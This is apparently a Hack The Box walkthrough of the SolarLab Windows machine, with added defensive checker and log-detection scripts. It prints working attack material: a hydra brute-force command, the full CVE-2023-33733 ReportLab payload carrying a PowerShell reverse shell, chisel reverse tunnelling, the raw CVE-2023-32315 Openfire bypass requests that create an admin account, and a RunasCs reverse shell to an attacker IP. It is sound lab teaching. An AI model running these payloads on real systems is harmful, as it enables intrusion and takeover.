A Windows machine from Hack The Box, officially rated Medium. It involves port 445 exploitation, web password brute-forcing, CVE-2023-33733 and CVE-2023-32315; overall a pretty well-made Windows box. Enough talk, let's get started.

Information gathering

Port scanning

The target has ports 80, 135, 139, 445 and 6791 open, and the scan also turned up the hostnames report.solarlab.htb:6791 and solarlab.htb; add all of them to the hosts file.

Port 445 exploitation

Seeing port 445 open, try an anonymous SMB login.

The target allows anonymous SMB access, so next take a look at the Documents folder.

Use the get command to download the files inside for local inspection; the details-file.xlsx file contains usernames and passwords, so save them for later.

Web port exploitation

With port 445 done, look at the web services on ports 80 and 6791.

Open the web page on port 80; nothing exploitable for now, so set it aside.

Open the web page on port 6791: it is a login page.

We just collected some credentials, so try brute-forcing with them:

hydra -L user.txt -P passwd.txt report.solarlab.htb -s 6791 http-post-form "/login:username=^USER^&password=^PASS^:#ff1919"

The brute-force failed. Looking at the collected usernames, Claudia has an s appended and Alexander a k, so blake.byte should likewise have a blakeb; add it to user.txt and brute-force again.

Successfully brute-forced the credentials blakeb:ThisCanB3typedeasily1@; add them to the password list for later use.

Web penetration

Log in to the port 6791 web page with the brute-forced credentials blakeb:ThisCanB3typedeasily1@.

After logging in there are four features, each somewhat different.

CVE-2023-33733

Searching the web for reportHub's known vulnerabilities turns up CVE-2023-33733: https://github.com/c53elyas/CVE-2023-33733

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>

Replace the touch command with an encoded reverse shell for Windows. When creating the report, be sure to select the signature option, otherwise the payload does not trigger.

Full PoC:

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e 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') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">

exploit

</font></para>

Reverse shell received.
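From the defender's side, the thing to notice about CVE-2023-33733 is that ReportLab evaluates the color attribute of paragraph markup as a sandboxed Python expression, and the PoC above escapes that sandbox through a class-definition expression. A literal color never needs evaluation, so besides upgrading ReportLab, an application that renders user-supplied markup can simply refuse any color-bearing attribute that is not a plain literal. The checker below is an added example written for this writeup, not code from the page, the PoC repository or ReportLab; the attribute list and the named-color subset are assumptions, and the sample markup is constructed (the PoC shape is abbreviated to a non-functional prefix).

```python
import re

# Added defensive example for CVE-2023-33733 (not code from the writeup or from
# ReportLab). A literal color is either "#hex" or a known name; anything else in a
# color-bearing attribute is treated as an expression and rejected before the markup
# ever reaches ReportLab's paragraph parser.

# Attribute names ReportLab treats as colors in <font>/<span>/<para> markup.
# This list is an assumption covering the common ones, not an exhaustive reference.
COLOR_ATTRS = ("color", "backcolor", "textcolor", "bgcolor", "fg", "bg")

ATTR_RE = re.compile(
    r"\b(" + "|".join(COLOR_ATTRS) + r")\s*=\s*(?:\"([^\"]*)\"|'([^']*)')",
    re.IGNORECASE,
)
HEX_RE = re.compile(r"^#(?:[0-9a-f]{3}|[0-9a-f]{6}|[0-9a-f]{8})$", re.IGNORECASE)
# Constructed subset of named colors; in practice extend it from reportlab.lib.colors.
NAMED = {"red", "green", "blue", "black", "white", "gray", "grey", "yellow", "orange"}


def is_literal_color(value: str) -> bool:
    """True only for '#hex' or a known color name; anything else is an expression."""
    v = value.strip()
    return bool(HEX_RE.match(v)) or v.lower() in NAMED


def unsafe_color_values(markup: str) -> list:
    """Return every color-attribute value in `markup` that is not a literal color."""
    bad = []
    for m in ATTR_RE.finditer(markup):
        value = m.group(2) if m.group(2) is not None else m.group(3)
        if not is_literal_color(value):
            bad.append(value)
    return bad


def is_safe_markup(markup: str) -> bool:
    """Gate to apply before passing untrusted markup to a ReportLab Paragraph."""
    return not unsafe_color_values(markup)


# Constructed samples: two benign paragraphs and an abbreviated, non-working
# version of the PoC's attribute shape.
SAMPLES = {
    "hex": '<para><font color="#ff1919">alert</font></para>',
    "named": "<para><font color='red'>ok</font> <font backColor=\"#FFF\">x</font></para>",
    "poc": "<para><font color=\"[[[getattr(pow, Word('__globals__')) ... ]]] and 'red'\">exploit</font></para>",
}

if __name__ == "__main__":
    for name, markup in SAMPLES.items():
        verdict = "safe" if is_safe_markup(markup) else f"REJECT {unsafe_color_values(markup)}"
        print(name, verdict)
```

The check is deliberately an allow-list: it does not try to recognise dangerous expressions, it only accepts values that could never be one. Applications that legitimately need computed colors should compute them server-side and substitute the literal before rendering.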

User flag

Got the user flag.

Internal penetration

Port forwarding

With a foothold on the box, check which ports it is listening on: 9090 and 9091 are there, very similar to the Jab machine done earlier, so proxy them out and take a look.

First start an HTTP server on the attacking machine and transfer chisel to the target.

Set up a proxy with chisel:

Server: ./chisel server -p 6666 --reverse
Client: ./chisel.exe client 10.10.14.66:6666 R:9090:127.0.0.1:9090

The proxy is up; visiting local port 9090 now reaches the target's port 9090.

CVE-2023-32315

Through the forward we can see it is Openfire 4.7.4, so the exploitation should be the same as on the HTB Jab machine. This time there are no login credentials, but fortunately an unauthenticated bypass exists.

CVE-2023-32315:https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass

First obtain the JSESSIONID and csrf token:

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1
Host: 127.0.0.1:9090
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Length: 0

We now have the JSESSIONID and csrf:

JSESSIONID=node013h0l9ukcoeaw1163xaatfgvb35.node0
csrf=OBwT92asQjLPqBJ

Then create a user:

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=OBwT92asQjLPqBJ&username=test&name=&email=&password=test&passwordConfirm=test&isadmin=on&create=Create+User HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=node013h0l9ukcoeaw1163xaatfgvb35.node0; csrf=OBwT92asQjLPqBJ
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

Log in to the admin console with the newly created user test/test.
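What makes the two requests above stand out in logs is their shape: Openfire exempts /setup/ from authentication, and the bypass sends a raw path that begins with /setup/ but, once the non-standard %u002e escapes are decoded and the "..", segments collapsed, lands on an admin-console page outside it. The scanner below is an added detection example written for this writeup, not code from the page or from the linked PoC repository. It assumes Common Log Format access logs (as a reverse proxy in front of the console would write them); the log lines are constructed, and the csrf value is a placeholder.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Added detection example for CVE-2023-32315 (constructed here, not code from the
# writeup or from the PoC repository it links). A request is flagged when its raw
# path starts with /setup/ but its decoded, normalized path escapes that prefix,
# when it uses the non-standard %uXXXX escape at all, or when it carries the
# admin-account creation parameter.

# Common Log Format; the sample lines below are constructed, not real Openfire logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)
# Jetty accepted the %uXXXX form used by the PoC on this page; plain
# percent-decoding would leave "%u002e" intact and miss the traversal.
U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_path(target: str) -> str:
    """Strip the query, undo %uXXXX and (double) percent-encoding, then collapse '..'."""
    path = target.split("?", 1)[0]
    path = U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), path)
    path = unquote(unquote(path))  # second pass catches %252e-style double encoding
    return normpath(path)


def classify(target: str) -> list:
    """Return the reasons a request target looks like the setup-path bypass (empty = clean)."""
    raw_path, _, query = target.partition("?")
    reasons = []
    if "%u" in raw_path.lower():
        reasons.append("non-standard %u encoding in path")
    if raw_path.lower().startswith("/setup/"):
        landed = decode_path(target)
        if not landed.lower().startswith("/setup/"):
            reasons.append("traversal out of /setup/ to " + landed)
    if "isadmin=on" in query.lower():
        reasons.append("admin-account creation parameter")
    return reasons


def scan(log_text: str) -> list:
    """Parse each log line and collect the ones that trigger at least one reason."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m.group("target"))
        if reasons:
            findings.append({"ip": m.group("ip"), "target": m.group("target"), "reasons": reasons})
    return findings


# Constructed access log: two normal requests, then the two bypass requests from
# this writeup (csrf value replaced by a placeholder) and a %2e-encoded variant.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2024:10:00:01 +0000] "GET /login.jsp HTTP/1.1" 200 2310
10.0.0.5 - - [01/May/2024:10:00:02 +0000] "GET /setup/index.jsp HTTP/1.1" 200 1800
10.0.0.9 - - [01/May/2024:10:00:03 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1" 200 5120
10.0.0.9 - - [01/May/2024:10:00:04 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=TOKEN_PLACEHOLDER&username=test&password=test&isadmin=on&create=Create+User HTTP/1.1" 200 4096
10.0.0.9 - - [01/May/2024:10:00:05 +0000] "GET /setup/setup-s/%2e%2e/%2e%2e/plugin-admin.jsp HTTP/1.1" 200 3300
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["target"][:60], "->", "; ".join(f["reasons"]))
```

Normalizing the decoded path rather than matching on the literal %u002e string is what keeps the rule useful against the standard-encoded and double-encoded variants; a plain /setup/ request during a legitimate first-time setup is left alone because it never leaves the prefix.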

Next, upload the plugin jar to get a reverse shell.

Access the uploaded shell under Server -> Server Settings.

Enter the password 123 to access the shell.

Choose a system command to spawn a reverse shell.

Privilege escalation

The reverse shell works, but unlike Jab this one is not SYSTEM, so privilege escalation is needed.

Spawn a new shell under the new privileges and browse the directories: openfire.script turns up. This is Openfire's database script file, and it contains the administrator's encrypted credentials.

It can be decrypted with the Openfire decryption tool: https://github.com/c0rdis/openfire_decrypt

Recovered the password ThisPasswordShouldDo!@

Upload RunasCs (https://github.com/antonioCoco/RunasCs)

Use RunasCs to get a reverse shell:

./RunasCs.exe administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.66:3333

Root flag

Got the root flag.